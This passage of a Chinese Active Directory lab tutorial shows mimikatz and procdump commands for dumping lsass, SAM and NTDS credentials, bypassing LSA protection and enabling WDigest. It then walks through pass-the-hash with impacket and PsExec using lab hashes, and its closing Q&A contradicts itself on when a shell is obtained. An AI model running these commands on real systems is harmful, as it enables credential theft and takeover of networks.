href="#2%e7%ae%80%e5%8d%95%e4%bd%bf%e7%94%a8-1" class="header-anchor"&gt;&lt;/a&gt;2、简单使用&#10;&lt;/h5&gt;&lt;p&gt;Mimikatz 能够从内存中提取纯⽂本密码，通过参数 &lt;code&gt;sekurlsa::minidump&lt;/code&gt; 载⼊刚才procdump 获取的 dmp ⽂件后，就可以使⽤ &lt;code&gt;sekurlsa::logonpasswords full&lt;/code&gt; 等命令，对密码进⾏读取。实现效果如下图：&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz.exe&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sekurlsa::minidump ./passwd.dmp&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sekurlsa::logonpasswords full&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0010.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0011.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;在这⾥可以看⻅图中带有管理员信息，若是中真实环境中拿到此信息基本就宣告着结束。&lt;/p&gt;&#10;&lt;h5 id="3进阶使用"&gt;&lt;a href="#3%e8%bf%9b%e9%98%b6%e4%bd%bf%e7%94%a8" class="header-anchor"&gt;&lt;/a&gt;3、进阶使用&#10;&lt;/h5&gt;&lt;p&gt;①利用procdump导下来的dump文件与mimikatz配合使用获取凭据&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # log //记录所得到的信息&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::minidump passwd.dmp //切换环境（挂载dmp文件）&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::logonpasswords //列出所有可用的凭据&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;②直接利用minikatz获取凭据（需要管理权限）&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikata # log //记录所得到的信息&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # privilege::debug //提权（获得mimikatz程序的特殊操作）&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::msv //提取内存的HASH值&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::logonpasswords //列出所有可用的凭据&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;h3 id="拥有本地管理员权限"&gt;&lt;a href="#%e6%8b%a5%e6%9c%89%e6%9c%ac%e5%9c%b0%e7%ae%a1%e7%90%86%e5%91%98%e6%9d%83%e9%99%90" class="header-anchor"&gt;&lt;/a&gt;拥有本地管理员权限&#10;&lt;/h3&gt;&lt;h4 id="获取密码"&gt;&lt;a href="#%e8%8e%b7%e5%8f%96%e5%af%86%e7%a0%81" class="header-anchor"&gt;&lt;/a&gt;获取密码&#10;&lt;/h4&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;span class="lnt"&gt;5&#10;&lt;/span&gt;&lt;span class="lnt"&gt;6&#10;&lt;/span&gt;&lt;span class="lnt"&gt;7&#10;&lt;/span&gt;&lt;span class="lnt"&gt;8&#10;&lt;/span&gt;&lt;span class="lnt"&gt;9&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;procdump.exe -accepteula -ma lsass.exe lsass.dmp&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz &amp;#34;privilege::debug&amp;#34; &amp;#34;sekurlsa::minidump lsass.dmp&amp;#34; &amp;#34;sekurlsa::logonPasswords&amp;#34; &amp;#34;exit&amp;#34;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz &amp;#34;privilege::debug&amp;#34; &amp;#34;token::elevate&amp;#34; &amp;#34;sekurlsa::logonpasswords&amp;#34; &amp;#34;lsadump::sam&amp;#34; &amp;#34;exit&amp;#34;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;hashdump: post/windows/gather/smart_hashdump&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;cme smb &amp;lt;ip_range&amp;gt; -u &amp;lt;user&amp;gt; -p &amp;lt;password&amp;gt; -M lsassy&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;cme smb &amp;lt;ip_range&amp;gt; -u &amp;lt;user&amp;gt; -p &amp;#39;&amp;lt;password&amp;gt;&amp;#39; --sam / --lsa / --ntds&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;h4 id="绕过lsa防护策略读取密码"&gt;&lt;a href="#%e7%bb%95%e8%bf%87lsa%e9%98%b2%e6%8a%a4%e7%ad%96%e7%95%a5%e8%af%bb%e5%8f%96%e5%af%86%e7%a0%81" class="header-anchor"&gt;&lt;/a&gt;绕过LSA防护策略读取密码&#10;&lt;/h4&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;PPLdump64.exe &amp;lt;lsass.exe|lsass_pid&amp;gt; lsass.dmp&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz &amp;#34;!+&amp;#34; &amp;#34;!processprotect /process:lsass.exe /remove&amp;#34; &amp;#34;privilege::debug&amp;#34; &amp;#34;token::elevate&amp;#34; &amp;#34;sekurlsa::logonpasswords&amp;#34; &amp;#34;!processprotect /process:lsass.exe&amp;#34; &amp;#34;!-&amp;#34; #with mimidriver.sys&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;总结流程：&lt;/p&gt;&#10;&lt;ol&gt;&#10;&lt;li&gt;获取NTLM hash&lt;/li&gt;&#10;&lt;/ol&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;使用procdump/PPLdump dump lsass进程&lt;/li&gt;&#10;&lt;li&gt;用mimikatz分析dump文件提取hash&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;ol&gt;&#10;&lt;li&gt;利用NTLM hash 选择路径：&lt;/li&gt;&#10;&lt;/ol&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;破解hash获取明文密码&lt;/li&gt;&#10;&lt;li&gt;直接使用hash进行PTH攻击(适用于无法破解情况)&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;p&gt;关键点：&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;NTLM hash在所有Windows系统中生成方式相同(MD4)&lt;/li&gt;&#10;&lt;li&gt;相同密码在不同机器生成相同hash&lt;/li&gt;&#10;&lt;li&gt;PTH不需要明文密码就能进行认证&lt;/li&gt;&#10;&lt;li&gt;dump lsass会包含所有已登录用户的凭据信息:&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;p&gt;特别点：&lt;/p&gt;&#10;&lt;ol&gt;&#10;&lt;li&gt;当前登录的管理员用户hash&lt;/li&gt;&#10;&lt;li&gt;其他已登录用户的hash&lt;/li&gt;&#10;&lt;li&gt;系统服务账户的hash&lt;/li&gt;&#10;&lt;/ol&gt;&#10;&lt;p&gt;但要注意:&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;只能获取已登录过的用户hash&lt;/li&gt;&#10;&lt;li&gt;未登录过的用户信息不会在lsass中&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;p&gt;实际上md4解密也能获得明文密码&lt;/p&gt;&#10;&lt;h3 id="五实验pthpass-the-hash哈希传递"&gt;&lt;a href="#%e4%ba%94%e5%ae%9e%e9%aa%8cpthpass-the-hash%e5%93%88%e5%b8%8c%e4%bc%a0%e9%80%92" class="header-anchor"&gt;&lt;/a&gt;五、实验：PTH（pass-the-hash）哈希传递&#10;&lt;/h3&gt;&lt;h4 id="简介"&gt;&lt;a href="#%e7%ae%80%e4%bb%8b" class="header-anchor"&gt;&lt;/a&gt;①简介&#10;&lt;/h4&gt;&lt;p&gt;哈希传递是⼀种⿊客技术，攻击者可⽤使⽤⽤户密码的hash对远程服务器进⾏身份验证，扩⼤战果。其实就是⼀种 &lt;code&gt;撞库&lt;/code&gt; 的⾏为。在拥有NTLM hash的情况下，我们可以⾮常轻易的使⽤mimikatz的 &lt;code&gt;sekurlsa::pth&lt;/code&gt; 发起⼀次 PTH。&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;攻击缺陷：hash 要保持静态（不修改密码）&lt;/li&gt;&#10;&lt;li&gt;适⽤于：域/⼯作组、可⽤获取 hash 但是不能爆破 hash，且内⽹有相同密码的机器。&lt;/li&gt;&#10;&lt;li&gt;KB2871997：修复了普通⽤户能够 pth，但是管理员除外，系统 &amp;gt;= win server 2012时，⽆法通过 lsass 进程中抓取明⽂密码。&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;p&gt;因 KB2871997 修复了普通⽤户能够 pth，所以需要使⽤ privilege::debug 来提升权限（在⾼权限终端下）。&lt;/p&gt;&#10;&lt;h4 id="基本条件"&gt;&lt;a href="#%e5%9f%ba%e6%9c%ac%e6%9d%a1%e4%bb%b6" class="header-anchor"&gt;&lt;/a&gt;②基本条件&#10;&lt;/h4&gt;&lt;p&gt;使⽤mimikatz的sekurlsa::pth模块⾄少需要知道以下条件：&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;pth 的对象 ：使⽤ &lt;code&gt;net user /domain&lt;/code&gt; 等命令即可查看域内⽤户信息&lt;/li&gt;&#10;&lt;li&gt;域名 ：使⽤ &lt;code&gt;net view /domain&lt;/code&gt; 等命令即可查看域名&lt;/li&gt;&#10;&lt;li&gt;NTLM hash ：可以通过使⽤procdump配合mimikatz获取&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;补充：&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;① reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f #开启密码抓取&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;② rundll32 user32.dll,LockWorkStation # 强制锁屏，为了让用户重新登录从而可以抓取lsass.exe文件中的密码&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;h4 id="适用条件"&gt;&lt;a href="#%e9%80%82%e7%94%a8%e6%9d%a1%e4%bb%b6" class="header-anchor"&gt;&lt;/a&gt;③适用条件&#10;&lt;/h4&gt;&lt;p&gt;适用于无需用户密码，只能拿到域控的NTLM Hash，而且无法解密的情况。&lt;/p&gt;&#10;&lt;h4 id="信息收集"&gt;&lt;a href="#%e4%bf%a1%e6%81%af%e6%94%b6%e9%9b%86" class="header-anchor"&gt;&lt;/a&gt;④信息收集&#10;&lt;/h4&gt;&lt;p&gt;寻找pth的对象 =&amp;gt; Administrator&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0012.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;查看管理员组成员 =&amp;gt; 选择攻击 Administrator&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0013.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;域名 =&amp;gt; MAO&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0014.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;拿到管理员的ntml hash =&amp;gt; 570a9a65db8fba761c1008a51d4c95ab&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;其实通过mimikatz.exe，啥都满足了：&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sekurlsa::minidump ./passwd.dmp&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sekurlsa::logonpasswords full&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0015.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h4 id="发起攻击"&gt;&lt;a href="#%e5%8f%91%e8%b5%b7%e6%94%bb%e5%87%bb" class="header-anchor"&gt;&lt;/a&gt;⑤发起攻击&#10;&lt;/h4&gt;&lt;h5 id="法一mimikatz直接pth"&gt;&lt;a href="#%e6%b3%95%e4%b8%80mimikatz%e7%9b%b4%e6%8e%a5pth" class="header-anchor"&gt;&lt;/a&gt;法一：mimikatz直接pth&#10;&lt;/h5&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sekurlsa::pth /user:&amp;lt;pth 的对象&amp;gt; /domain:&amp;lt;域名&amp;gt; /ntlm:&amp;lt;ntlm hash&amp;gt; [/run:name]&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;privilege::debug&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sekurlsa::pth /user:Administrator /domain:MAO /ntlm:570a9a65db8fba761c1008a51d4c95ab /run:cmd&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;拿下域控权限。(如果参数都填写正确的情况下，还是无法攻击成功的话，尝试关闭mimikatz窗口，重新以管理员启动cmd.exe，重新提升权限，再进行攻击。run后面的命令不写也行，默认开启域控的cmd.exe)&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0016.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="法二凭据传递脚本获取shell"&gt;&lt;a href="#%e6%b3%95%e4%ba%8c%e5%87%ad%e6%8d%ae%e4%bc%a0%e9%80%92%e8%84%9a%e6%9c%ac%e8%8e%b7%e5%8f%96shell" class="header-anchor"&gt;&lt;/a&gt;法二：凭据传递脚本获取shell&#10;&lt;/h5&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt; 1&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 2&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 3&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 4&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 5&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 6&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 7&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 8&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 9&#10;&lt;/span&gt;&lt;span class="lnt"&gt;10&#10;&lt;/span&gt;&lt;span class="lnt"&gt;11&#10;&lt;/span&gt;&lt;span class="lnt"&gt;12&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;①smbexec.py&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;python /opt/impacket/build/scripts-3.12/smbexec.py -hashes :2b2ddd54e1f78fab85e7c662f672f30e TEST/Administrator@192.168.0.110&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;smbexec.py administrator:&amp;#39;password&amp;#39;@&amp;lt;target-ip&amp;gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;②wmiexec.py&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;python /opt/impacket/build/scripts-3.12/wmiexec.py -hashes :2b2ddd54e1f78fab85e7c662f672f30e TEST/Administrator@192.168.0.110&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;wmiexec.py administrator:&amp;#39;password&amp;#39;@&amp;lt;target-ip&amp;gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/opt/impacket/build/scripts-3.12/psexec.py administrator:&amp;#39;password&amp;#39;@10.10.10.97&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;PsExec.exe \\WindowsServerAD.test.local -u test\administrator -hashes :2b2ddd54e1f78fab85e7c662f672f30e cmd&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;PsExec.exe -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 FOREST/administrator@10.10.10.161&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;psexec.exe &amp;#34;administrator&amp;#34;@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0017.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt; 1&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 2&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 3&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 4&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 5&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 6&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 7&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 8&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 9&#10;&lt;/span&gt;&lt;span class="lnt"&gt;10&#10;&lt;/span&gt;&lt;span class="lnt"&gt;11&#10;&lt;/span&gt;&lt;span class="lnt"&gt;12&#10;&lt;/span&gt;&lt;span class="lnt"&gt;13&#10;&lt;/span&gt;&lt;span class="lnt"&gt;14&#10;&lt;/span&gt;&lt;span class="lnt"&gt;15&#10;&lt;/span&gt;&lt;span class="lnt"&gt;16&#10;&lt;/span&gt;&lt;span class="lnt"&gt;17&#10;&lt;/span&gt;&lt;span class="lnt"&gt;18&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;1 如果说我传递的是一个普通用户的hash 是否也能拿到shell？&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;2 普通用户的hash是域账户的？ 还是域控普通用户的&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;3 如果域控普通账户也可以传递hash 是不是就是说只要在域控创建账户 就说明他就是域账号了&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;1.普通用户hash传递：&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;能获得shell，但权限受限&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;只能访问被授权的资源&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;无法执行管理员操作&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;2.普通用户hash来源：&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;是域用户账户的hash&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;不是本地账户的hash&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;用于域内认证的凭据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;3.域账户和本地账户：&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;在域控创建的用户自动成为域用户&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;域用户可以在域内认证&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;本地账户只能在本机使用&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;关键：PTH是传递域账户的hash，不管是管理员还是普通用户。&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;而且只有当获取到域控管理员的hash才能拿到shell&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;h3 id="六kerberos认证协议"&gt;&lt;a href="#%e5%85%adkerberos%e8%ae%a4%e8%af%81%e5%8d%8f%e8%ae%ae" 